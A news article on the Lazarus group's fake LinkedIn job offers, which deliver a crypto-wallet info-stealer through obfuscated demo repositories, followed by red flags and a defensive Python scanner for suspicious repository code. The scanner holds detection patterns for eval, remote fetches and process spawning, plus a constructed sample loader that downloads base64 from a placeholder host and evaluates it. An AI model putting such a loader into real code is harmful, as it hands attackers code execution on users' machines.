LinkedIn has become a prime hunting ground for cyber criminals – here’s what you need to look out for


LinkedIn has emerged as a lucrative hunting ground for cyber criminals in recent years, with threat actors conducting a range of social engineering campaigns centered around fake job offers.

Last year, security company Clear Sky revealed a social engineering campaign using fraudulent LinkedIn identities to trick users into downloading malware with these job offers, for example.

Led by an Iranian threat group, this particular campaign built on techniques first observed being employed by the North Korean Lazarus group.

Now, fresh details on the extent of the threat posed by the Lazarus group have been revealed by Bitdefender Labs. A report from the cybersecurity firm details how one scammer approached a researcher who was able to record the tactics employed in the threat campaign.

The scammer first approached the researcher with an ‘opportunity’ to work on a decentralized cryptocurrency exchange, claiming the minimum viable product (MVP) was already complete and that the researcher would be employed as a front-end developer.

Bitdefender reported that once the target expressed interest in the vacancy, the scammer requested they provide a CV or personal GitHub repository link, which it said could be used to harvest personal data as well as make the offer appear genuine.

After these are supplied, the attacker shares a repository containing the MVP of the project, as well as a feedback document labelled ‘Candidate Evaluation and Feedback For’, which includes questions that cannot be answered unless the target runs the demo.

Analysis of the heavily obfuscated code revealed that it dynamically loads malicious code from a third-party endpoint. Bitdefender found that the payload is a cross-platform info-stealer engineered to target a range of popular cryptocurrency wallets.

The next payload drops further dependencies designed to ensure persistence on the target system, establish command and control (C2), and avoid detection.

Bitdefender said its analysis of the malware and operational tactics employed by the attacker indicated the attack was part of a larger campaign carried out by the Lazarus Group, a state-sponsored threat actor based in North Korea.

The attackers’ objectives extend beyond data theft, the report claimed, stating the group has been observed targeting victims working in sensitive sectors such as aviation, defense, and nuclear industries with the aim of exfiltrating classified information, proprietary technology, and corporate credentials.

The group has also been recorded targeting enterprises with fake job-seeker scams, in which hackers posing as remote IT workers based in other parts of the world try to gain entry to businesses in order to establish persistence on the corporate network.

How to protect yourself on LinkedIn

As a professional network, it’s not out of the ordinary to receive job offers via LinkedIn. The platform has an in-built jobs board, allowing enterprises to post vacant positions.

However, when approached by an individual, it’s wise to remain vigilant and be wary of any telltale signs that you may be prey for a cyber criminal.

Bitdefender set out a series of red flags individuals can look out for, including offers with vague descriptions of the role that do not correspond to an existing job posting on the platform.

Suspicious repositories that belong to users with ‘random names’ and lack proper documentation or a long contribution history are also strong indicators that the sender has malicious intentions.

Finally, users should also look out for spelling errors in any correspondence they have with the suspected scammer, as well as evidence of poor communication such as refusing to provide alternative contact methods.

There are also best practices Bitdefender recommends users can follow to minimize the risk they face of falling for similar scams, such as never running unverified code outside of virtual machines, sandboxes, or online code testing platforms.
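The loader shape described above, a script that fetches content from a third-party endpoint and hands it straight to `eval`, is something a candidate can look for before running a stranger's demo at all, whether or not a sandbox is available. The triage script below is an added example written for this article; it is not Bitdefender's tooling, and its patterns, verdict thresholds and the constructed sample files are assumptions chosen to illustrate the fetch-then-eval pattern, not published indicators from the report.

```python
import os
import re
from dataclasses import dataclass

# Heuristic patterns chosen for this example (not Bitdefender's indicators).
# Each one on its own can be legitimate; the combination fetch + eval is the
# remote-loader shape the article describes and is what the verdict keys on.
SUSPICIOUS_PATTERNS = {
    "dynamic_eval": re.compile(r"\b(eval|Function)\s*\("),
    "remote_fetch": re.compile(r"\b(fetch|axios\.(get|post)|https?\.get|request)\s*\("),
    "shell_exec": re.compile(r"child_process|\bexec(Sync)?\s*\(|\bspawn\s*\("),
    "charcode_obfuscation": re.compile(r"String\.fromCharCode"),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
}

SOURCE_EXTENSIONS = (".js", ".mjs", ".cjs", ".ts", ".json", ".py")


@dataclass
class Finding:
    path: str
    line: int
    tag: str
    snippet: str


def scan_source(text, path="<inline>"):
    """Return one Finding per (line, pattern) hit in a single source file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for tag, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                findings.append(Finding(path, lineno, tag, line.strip()[:80]))
    return findings


def assess(findings):
    """Collapse findings into a verdict: clean / low / medium / high."""
    tags = {f.tag for f in findings}
    if "dynamic_eval" in tags and "remote_fetch" in tags:
        return "high"    # remote content reaching eval/Function: do not run
    if tags & {"dynamic_eval", "shell_exec", "long_base64_blob"}:
        return "medium"  # obfuscation or process spawning: read before running
    if tags:
        return "low"
    return "clean"


def scan_repo(root):
    """Walk a cloned repository, skipping .git and node_modules."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in (".git", "node_modules")]
        for name in filenames:
            if name.endswith(SOURCE_EXTENSIONS):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(fh.read(), full))
    return findings


# Constructed sample (not real malware): a small "config loader" that pulls
# a base64 body from a placeholder host and evaluates it.
CONSTRUCTED_LOADER = '''const axios = require("axios");
async function init() {
  const r = await axios.get("https://example.invalid/cfg");  // placeholder host
  eval(Buffer.from(r.data, "base64").toString());
}
init();
'''

# Constructed sample of an ordinary front-end file for comparison.
CONSTRUCTED_BENIGN = '''import React from "react";
export default function App() { return <h1>Hello</h1>; }
'''

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        results = scan_repo(sys.argv[1])          # python triage.py /path/to/clone
    else:
        results = scan_source(CONSTRUCTED_LOADER, "constructed_loader.js")
    for f in results:
        print(f"{f.path}:{f.line} [{f.tag}] {f.snippet}")
    print("verdict:", assess(results))
```

A "high" verdict is a reason to stop and ask the sender why a front-end demo needs to execute code it downloads at runtime; a "clean" verdict only means these particular heuristics found nothing, so the sandbox advice still applies.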
